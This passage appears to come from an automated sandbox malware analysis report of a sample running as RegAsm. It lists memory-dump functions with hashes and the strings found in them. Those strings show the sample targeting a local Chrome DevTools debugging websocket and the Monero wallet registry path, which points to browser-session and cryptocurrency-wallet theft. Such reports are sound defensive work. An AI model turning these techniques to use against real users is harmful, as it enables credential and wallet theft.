                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocLocal
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3494564517-0
                                                                                                                                                                                                                                                            • Opcode ID: c377abbe058f10c7c61271b5a3be8125000977851a4c9f7b22e962b9518e095b
                                                                                                                                                                                                                                                            • Instruction ID: 0bcc5d993c2c7e37ca0594778a99a0c5f3d31ca37785c4404c3f400d8cff8a5e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c377abbe058f10c7c61271b5a3be8125000977851a4c9f7b22e962b9518e095b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53F0A5783412059FDB49DF68C8E1B2537A2FB89318F148468ED49CB3A6DA35E815CB14
                                                                                                                                                                                                                                                            Function 00421A85 Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00421A96
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocLocal
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3494564517-0
                                                                                                                                                                                                                                                            • Opcode ID: 0f8be814a7971a368e9821d9d7834ddabbc1989af1d6b07cbf4874eb77a62b40
                                                                                                                                                                                                                                                            • Instruction ID: 14f6cd4519ee4ebef17a717330bcb3ff299f631b71273e661ec660b2a6ef47df
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f8be814a7971a368e9821d9d7834ddabbc1989af1d6b07cbf4874eb77a62b40
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4D0A77A3462029BDB0CCB51DCB1E32732BBF94310714C16C8902477D4EA316400CB15
                                                                                                                                                                                                                                                            Function 0042CF30 Relevance: 1.3, APIs: 1, Instructions: 14sleepCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                                                                                                            • Opcode ID: 5dea162a58ecae8de7f2311a69ea6b7820db9053f5f8bcad363771db4238dece
                                                                                                                                                                                                                                                            • Instruction ID: c4cd275ba534db618227e8673299b130c2c96b59d8a8ec562d0084890e5482b0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5dea162a58ecae8de7f2311a69ea6b7820db9053f5f8bcad363771db4238dece
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BEE0EC76A40190CFC20DDB14D9D4F6873A2AB99342BA14254D626476E1EF36AD44DB2C

                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                            Function 0040B4E1 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 99COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                                                                            • String ID: /devtools$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                            • API String ID: 2221118986-2676143373
                                                                                                                                                                                                                                                            • Opcode ID: db8ba058892ff46890d0d8dff12277a57eb397f3e5172dda719e70686d6ed947
                                                                                                                                                                                                                                                            • Instruction ID: 94e44766b1f48ed0313359b6b2832c1626453bbd1d254d7316a7bd8e4186ea0b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db8ba058892ff46890d0d8dff12277a57eb397f3e5172dda719e70686d6ed947
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D31EAB67801109FD704DBA8DCC1E6E37BCEBC6714B0C4129E906D3352DA789A65CB59
                                                                                                                                                                                                                                                            Function 004011B9 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                                                                            • String ID: SOFTWARE\monero-project\monero-core$qqt$wallet_path
                                                                                                                                                                                                                                                            • API String ID: 2221118986-2179174401
                                                                                                                                                                                                                                                            • Opcode ID: 6547e106f19dbda9d7c1aadcfe2a743e189930704852a13bb4a66418b43e7448
                                                                                                                                                                                                                                                            • Instruction ID: 7a2c87307ec0540e7d715f3f6b37445b2dbc1dc42b57d5ae72fd3d8d753b74c4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6547e106f19dbda9d7c1aadcfe2a743e189930704852a13bb4a66418b43e7448
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4901C4757101006BD308E758EC8AE3F37AEE7C6755F48402EF805E7742EAE8A919876D